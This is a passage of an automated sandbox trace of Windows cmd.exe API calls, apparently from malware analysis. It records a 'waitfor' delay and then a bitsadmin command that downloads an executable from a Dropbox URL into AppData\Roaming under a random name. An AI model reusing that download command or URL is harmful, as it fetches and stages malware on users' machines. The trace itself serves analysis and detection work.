(_String1="IF/?", _String2="bitsadmin") returned 7 [0017.606] _wcsicmp (_String1="REM", _String2="bitsadmin") returned 16 [0017.606] _wcsicmp (_String1="REM/?", _String2="bitsadmin") returned 16 [0017.609] _wcsicmp (_String1="start", _String2=")") returned 74 [0017.609] _wcsicmp (_String1="FOR", _String2="start") returned -13 [0017.609] _wcsicmp (_String1="FOR/?", _String2="start") returned -13 [0017.609] _wcsicmp (_String1="IF", _String2="start") returned -10 [0017.609] _wcsicmp (_String1="IF/?", _String2="start") returned -10 [0017.609] _wcsicmp (_String1="REM", _String2="start") returned -1 [0017.609] _wcsicmp (_String1="REM/?", _String2="start") returned -1 [0017.609] GetConsoleTitleW (in: lpConsoleTitle=0x20f670, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0017.610] _wcsicmp (_String1="waitfor", _String2="DIR") returned 19 [0017.610] _wcsicmp (_String1="waitfor", _String2="ERASE") returned 18 [0017.610] _wcsicmp (_String1="waitfor", _String2="DEL") returned 19 [0017.610] _wcsicmp (_String1="waitfor", _String2="TYPE") returned 3 [0017.610] _wcsicmp (_String1="waitfor", _String2="COPY") returned 20 [0017.610] _wcsicmp (_String1="waitfor", _String2="CD") returned 20 [0017.610] _wcsicmp (_String1="waitfor", _String2="CHDIR") returned 20 [0017.610] _wcsicmp (_String1="waitfor", _String2="RENAME") returned 5 [0017.610] _wcsicmp (_String1="waitfor", _String2="REN") returned 5 [0017.610] _wcsicmp (_String1="waitfor", _String2="ECHO") returned 18 [0017.610] _wcsicmp (_String1="waitfor", _String2="SET") returned 4 [0017.610] _wcsicmp (_String1="waitfor", _String2="PAUSE") returned 7 [0017.610] _wcsicmp (_String1="waitfor", _String2="DATE") returned 19 [0017.610] _wcsicmp (_String1="waitfor", _String2="TIME") returned 3 [0017.610] _wcsicmp (_String1="waitfor", _String2="PROMPT") returned 7 [0017.610] _wcsicmp (_String1="waitfor", _String2="MD") returned 10 [0017.610] _wcsicmp (_String1="waitfor", _String2="MKDIR") returned 10 [0017.610] _wcsicmp (_String1="waitfor", _String2="RD") returned 5 [0017.610] _wcsicmp (_String1="waitfor", _String2="RMDIR") returned 5 [0017.610] _wcsicmp (_String1="waitfor", _String2="PATH") returned 7 [0017.610] _wcsicmp (_String1="waitfor", _String2="GOTO") returned 16 [0017.610] _wcsicmp (_String1="waitfor", _String2="SHIFT") returned 4 [0017.610] _wcsicmp (_String1="waitfor", _String2="CLS") returned 20 [0017.610] _wcsicmp (_String1="waitfor", _String2="CALL") returned 20 [0017.610] _wcsicmp (_String1="waitfor", _String2="VERIFY") returned 1 [0017.610] _wcsicmp (_String1="waitfor", _String2="VER") returned 1 [0017.610] _wcsicmp (_String1="waitfor", _String2="VOL") returned 1 [0017.610] _wcsicmp (_String1="waitfor", _String2="EXIT") returned 18 [0017.610] _wcsicmp (_String1="waitfor", _String2="SETLOCAL") returned 4 [0017.610] _wcsicmp (_String1="waitfor", _String2="ENDLOCAL") returned 18 [0017.610] _wcsicmp (_String1="waitfor", _String2="TITLE") returned 3 [0017.610] _wcsicmp (_String1="waitfor", _String2="START") returned 4 [0017.610] _wcsicmp (_String1="waitfor", _String2="DPATH") returned 19 [0017.610] _wcsicmp (_String1="waitfor", _String2="KEYS") returned 12 [0017.610] _wcsicmp (_String1="waitfor", _String2="MOVE") returned 10 [0017.610] _wcsicmp (_String1="waitfor", _String2="PUSHD") returned 7 [0017.610] _wcsicmp (_String1="waitfor", _String2="POPD") returned 7 [0017.610] _wcsicmp (_String1="waitfor", _String2="ASSOC") returned 22 [0017.610] _wcsicmp (_String1="waitfor", _String2="FTYPE") returned 17 [0017.610] _wcsicmp (_String1="waitfor", _String2="BREAK") returned 21 [0017.610] _wcsicmp (_String1="waitfor", _String2="COLOR") returned 20 [0017.610] _wcsicmp (_String1="waitfor", _String2="MKLINK") returned 10 [0017.610] _wcsicmp (_String1="waitfor", _String2="DIR") returned 19 [0017.610] _wcsicmp (_String1="waitfor", _String2="ERASE") returned 18 [0017.610] _wcsicmp (_String1="waitfor", _String2="DEL") returned 19 [0017.610] _wcsicmp (_String1="waitfor", _String2="TYPE") returned 3 [0017.610] _wcsicmp (_String1="waitfor", _String2="COPY") returned 20 [0017.610] _wcsicmp (_String1="waitfor", _String2="CD") returned 20 [0017.610] _wcsicmp (_String1="waitfor", _String2="CHDIR") returned 20 [0017.610] _wcsicmp (_String1="waitfor", _String2="RENAME") returned 5 [0017.610] _wcsicmp (_String1="waitfor", _String2="REN") returned 5 [0017.610] _wcsicmp (_String1="waitfor", _String2="ECHO") returned 18 [0017.610] _wcsicmp (_String1="waitfor", _String2="SET") returned 4 [0017.610] _wcsicmp (_String1="waitfor", _String2="PAUSE") returned 7 [0017.610] _wcsicmp (_String1="waitfor", _String2="DATE") returned 19 [0017.610] _wcsicmp (_String1="waitfor", _String2="TIME") returned 3 [0017.610] _wcsicmp (_String1="waitfor", _String2="PROMPT") returned 7 [0017.610] _wcsicmp (_String1="waitfor", _String2="MD") returned 10 [0017.610] _wcsicmp (_String1="waitfor", _String2="MKDIR") returned 10 [0017.611] _wcsicmp (_String1="waitfor", _String2="RD") returned 5 [0017.611] _wcsicmp (_String1="waitfor", _String2="RMDIR") returned 5 [0017.611] _wcsicmp (_String1="waitfor", _String2="PATH") returned 7 [0017.611] _wcsicmp (_String1="waitfor", _String2="GOTO") returned 16 [0017.611] _wcsicmp (_String1="waitfor", _String2="SHIFT") returned 4 [0017.611] _wcsicmp (_String1="waitfor", _String2="CLS") returned 20 [0017.611] _wcsicmp (_String1="waitfor", _String2="CALL") returned 20 [0017.611] _wcsicmp (_String1="waitfor", _String2="VERIFY") returned 1 [0017.611] _wcsicmp (_String1="waitfor", _String2="VER") returned 1 [0017.611] _wcsicmp (_String1="waitfor", _String2="VOL") returned 1 [0017.611] _wcsicmp (_String1="waitfor", _String2="EXIT") returned 18 [0017.611] _wcsicmp (_String1="waitfor", _String2="SETLOCAL") returned 4 [0017.611] _wcsicmp (_String1="waitfor", _String2="ENDLOCAL") returned 18 [0017.611] _wcsicmp (_String1="waitfor", _String2="TITLE") returned 3 [0017.611] _wcsicmp (_String1="waitfor", _String2="START") returned 4 [0017.611] _wcsicmp (_String1="waitfor", _String2="DPATH") returned 19 [0017.611] _wcsicmp (_String1="waitfor", _String2="KEYS") returned 12 [0017.611] _wcsicmp (_String1="waitfor", _String2="MOVE") returned 10 [0017.611] _wcsicmp (_String1="waitfor", _String2="PUSHD") returned 7 [0017.611] _wcsicmp (_String1="waitfor", _String2="POPD") returned 7 [0017.611] _wcsicmp (_String1="waitfor", _String2="ASSOC") returned 22 [0017.611] _wcsicmp (_String1="waitfor", _String2="FTYPE") returned 17 [0017.611] _wcsicmp (_String1="waitfor", _String2="BREAK") returned 21 [0017.611] _wcsicmp (_String1="waitfor", _String2="COLOR") returned 20 [0017.611] _wcsicmp (_String1="waitfor", _String2="MKLINK") returned 10 [0017.611] _wcsicmp (_String1="waitfor", _String2="FOR") returned 17 [0017.611] _wcsicmp (_String1="waitfor", _String2="IF") returned 14 [0017.611] _wcsicmp (_String1="waitfor", _String2="REM") returned 5 [0017.611] _wcsnicmp (_String1="wait", _String2="cmd ", _MaxCount=0x4) returned 20 [0017.611] SetErrorMode (uMode=0x0) returned 0x8001 [0017.612] SetErrorMode (uMode=0x1) returned 0x0 [0017.612] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x401550, lpFilePart=0x20ef00 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x20ef00*="Desktop") returned 0x19 [0017.612] SetErrorMode (uMode=0x8001) returned 0x1 [0017.612] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91 [0017.612] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0017.615] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab4f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0017.616] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0017.616] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\waitfor.*", fInfoLevelId=0x1, lpFindFileData=0x20ec70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec70) returned 0xffffffffffffffff [0017.616] GetLastError () returned 0x2 [0017.616] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\waitfor", fInfoLevelId=0x1, lpFindFileData=0x20ec70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec70) returned 0xffffffffffffffff [0017.616] GetLastError () returned 0x2 [0017.616] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0017.616] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\waitfor.*", fInfoLevelId=0x1, lpFindFileData=0x20ec70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec70) returned 0x41c410 [0017.616] FindClose (in: hFindFile=0x41c410 | out: hFindFile=0x41c410) returned 1 [0017.616] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\waitfor.COM", fInfoLevelId=0x1, lpFindFileData=0x20ec70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec70) returned 0xffffffffffffffff [0017.616] GetLastError () returned 0x2 [0017.616] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\waitfor.EXE", fInfoLevelId=0x1, lpFindFileData=0x20ec70, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ec70) returned 0x41c410 [0017.616] FindClose (in: hFindFile=0x41c410 | out: hFindFile=0x41c410) returned 1 [0017.617] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0017.617] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0017.617] GetConsoleTitleW (in: lpConsoleTitle=0x20f1c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0017.617] InitializeProcThreadAttributeList (in: lpAttributeList=0x20ef78, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20ef38 | out: lpAttributeList=0x20ef78, lpSize=0x20ef38) returned 1 [0017.617] UpdateProcThreadAttribute (in: lpAttributeList=0x20ef78, dwFlags=0x0, Attribute=0x60001, lpValue=0x20ef28, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20ef78, lpPreviousValue=0x0) returned 1 [0017.617] GetStartupInfoW (in: lpStartupInfo=0x20f090 | out: lpStartupInfo=0x20f090*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0017.617] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0017.618] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0017.618] lstrcmpW (lpString1="\\waitfor.exe", lpString2="\\XCOPY.EXE") returned -1 [0017.619] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\waitfor.exe", lpCommandLine="waitfor /t 5 YKERQ ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\Desktop", lpStartupInfo=0x20efb0*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="waitfor /t 5 YKERQ ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20ef60 | out: lpCommandLine="waitfor /t 5 YKERQ ", lpProcessInformation=0x20ef60*(hProcess=0x54, hThread=0x50, dwProcessId=0xa6c, dwThreadId=0xa70)) returned 1 [0017.622] CloseHandle (hObject=0x50) returned 1 [0017.623] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0017.623] GetEnvironmentStringsW () returned 0x41ae70* [0017.623] FreeEnvironmentStringsW (penv=0x41ae70) returned 1 [0017.623] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0022.728] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x20eea8 | out: lpExitCode=0x20eea8*=0x1) returned 1 [0022.728] CloseHandle (hObject=0x54) returned 1 [0022.728] _vsnwprintf (in: _Buffer=0x20f118, _BufferCount=0x13, _Format="%08X", _ArgList=0x20eeb8 | out: _Buffer="00000001") returned 8 [0022.728] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0022.728] GetEnvironmentStringsW () returned 0x41c410* [0022.728] FreeEnvironmentStringsW (penv=0x41c410) returned 1 [0022.728] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0022.729] GetEnvironmentStringsW () returned 0x41c410* [0022.729] FreeEnvironmentStringsW (penv=0x41c410) returned 1 [0022.729] DeleteProcThreadAttributeList (in: lpAttributeList=0x20ef78 | out: lpAttributeList=0x20ef78) [0022.729] GetConsoleTitleW (in: lpConsoleTitle=0x20f5b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0022.729] SetErrorMode (uMode=0x0) returned 0x8001 [0022.729] SetErrorMode (uMode=0x1) returned 0x0 [0022.729] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x41ae80, lpFilePart=0x20ee40 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x20ee40*="Desktop") returned 0x19 [0022.729] SetErrorMode (uMode=0x8001) returned 0x1 [0022.730] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab4f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\;C:\\Program Files\\Microsoft Office\\root\\Client") returned 0x91 [0022.730] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0022.730] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab4f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0022.730] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0022.730] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\bitsadmin.*", fInfoLevelId=0x1, lpFindFileData=0x20ebb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ebb0) returned 0xffffffffffffffff [0022.730] GetLastError () returned 0x2 [0022.730] FindFirstFileExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\bitsadmin", fInfoLevelId=0x1, lpFindFileData=0x20ebb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ebb0) returned 0xffffffffffffffff [0022.730] GetLastError () returned 0x2 [0022.731] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0022.731] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bitsadmin.*", fInfoLevelId=0x1, lpFindFileData=0x20ebb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ebb0) returned 0x401c80 [0022.731] FindClose (in: hFindFile=0x401c80 | out: hFindFile=0x401c80) returned 1 [0022.731] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bitsadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x20ebb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ebb0) returned 0xffffffffffffffff [0022.731] GetLastError () returned 0x2 [0022.731] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bitsadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x20ebb0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ebb0) returned 0x401c80 [0022.731] FindClose (in: hFindFile=0x401c80 | out: hFindFile=0x401c80) returned 1 [0022.731] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0022.731] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0022.731] GetConsoleTitleW (in: lpConsoleTitle=0x20f100, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0022.731] InitializeProcThreadAttributeList (in: lpAttributeList=0x20eeb8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20ee78 | out: lpAttributeList=0x20eeb8, lpSize=0x20ee78) returned 1 [0022.731] UpdateProcThreadAttribute (in: lpAttributeList=0x20eeb8, dwFlags=0x0, Attribute=0x60001, lpValue=0x20ee68, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20eeb8, lpPreviousValue=0x0) returned 1 [0022.731] GetStartupInfoW (in: lpStartupInfo=0x20efd0 | out: lpStartupInfo=0x20efd0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0022.732] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0022.733] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0022.733] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0022.733] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0022.733] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0022.733] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0022.733] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0022.733] lstrcmpW (lpString1="\\bitsadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0022.733] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bitsadmin.exe", lpCommandLine="bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\Desktop", lpStartupInfo=0x20eef0*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20eea0 | out: lpCommandLine="bitsadmin /transfer UKEF /download /priority normal https://www.dropbox.com/s/7b9332r6vmiuhxl/1qesyozananrivoxityof.exe?dl=1 C:\\Users\\aETAdzjz\\AppData\\Roaming\\iuoldw.exe ", lpProcessInformation=0x20eea0*(hProcess=0x50, hThread=0x54, dwProcessId=0xa90, dwThreadId=0xa94)) returned 1 [0022.738] CloseHandle (hObject=0x54) returned 1 [0022.738] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0022.738] GetEnvironmentStringsW () returned 0x41c410* [0022.738] FreeEnvironmentStringsW (penv=0x41c410) returned 1 [0022.738] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0076.980] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x20ede8 | out: lpExitCode=0x20ede8*=0x0) returned 1 [0076.980] CloseHandle (hObject=0x50) returned 1 [0076.980] _vsnwprintf (in: _Buffer=0x20f058, _BufferCount=0x13, _Format="%08X", _ArgList=0x20edf8 | out: _Buffer="00000000") returned 8 [0076.980] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0076.981] GetEnvironmentStringsW () returned 0x41c410* [0076.981] FreeEnvironmentStringsW (penv=0x41c410) returned 1 [0076.981] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0076.981] GetEnvironmentStringsW () returned 0x41c410* [0076.981] FreeEnvironmentStringsW (penv=0x41c410) returned 1 [0076.981] DeleteProcThreadAttributeList (in: lpAttributeList=0x20eeb8 | out: lpAttributeList=0x20eeb8) 